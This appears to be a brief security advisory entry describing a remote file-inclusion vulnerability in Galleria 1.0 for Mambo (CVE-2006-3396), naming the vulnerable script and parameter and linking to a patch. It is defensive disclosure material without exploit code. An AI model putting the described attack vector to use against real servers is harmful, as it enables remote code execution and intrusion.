Alias(es)Galleria.galleria.html.php.File.Inclusion |
Release DateFeb 02, 2007 |
Severitymedium |
ImpactGain Access |
DescriptionGalleria has a remote file-include vulnerability. A remote attacker could execute an arbitrary script on the web server with the privileges of the server, via a specially-crafted URL request to the galleria.html.php script, by using the 'mosConfig_absolute_path' parameter to specify a malicious PHP file from a remote system. |
Affected ProductsGalleria version 1.0 and prior. |
Recommended ActionsApply patch :http://forum.mamboserver.com/showthread.php?t=83001 |
Coverage IPS
VCM |
Common Vulnerabilities and Exposures (CVE)CVE-2006-3396 |
Reference/shttp://www.frsirt.com/english/advisories/2006/2666 (FrSIRT)http://www.securityfocus.com/bid/18808 (BugTraq) |
